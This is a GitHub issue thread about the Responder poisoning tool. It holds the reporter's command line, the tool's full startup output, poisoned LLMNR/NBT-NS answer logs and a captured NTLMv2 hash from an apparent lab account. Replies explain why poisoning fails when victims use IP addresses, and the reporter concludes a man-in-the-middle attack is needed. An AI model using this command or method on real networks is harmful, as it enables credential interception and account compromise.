Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Not work when victime use the ip address to access to the shared folders #280

Closed
MiMaz7707 opened this issue Jul 2, 2024 · 3 comments
Closed

Not work when victime use the ip address to access to the shared folders #280

MiMaz7707 opened this issue Jul 2, 2024 · 3 comments

Comments

@MiMaz7707
Copy link

Hello,

it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.

`responder -I eth0 -dwv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -| --| _ | _ | | _ || -| _|
|| ||| ||||||||
|_|

       NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.117.200]
Responder IPv6 [fe80::9024:b852:9137:c6f]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-OE0U3JW4FXX]
Responder Domain Name [WYT3.LOCAL]
Responder DCE-RPC Port [46345]

[+] Listening for events...

[] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `
@lgandx
Copy link
Owner

lgandx commented Jul 2, 2024 via email

@danbinns-ss
Copy link

LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.

@MiMaz7707
Copy link
Author

Hello,

i get it, so it need to do a MiTM attack to get response from victimes that use ip address.

Thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@lgandx @danbinns-ss @MiMaz7707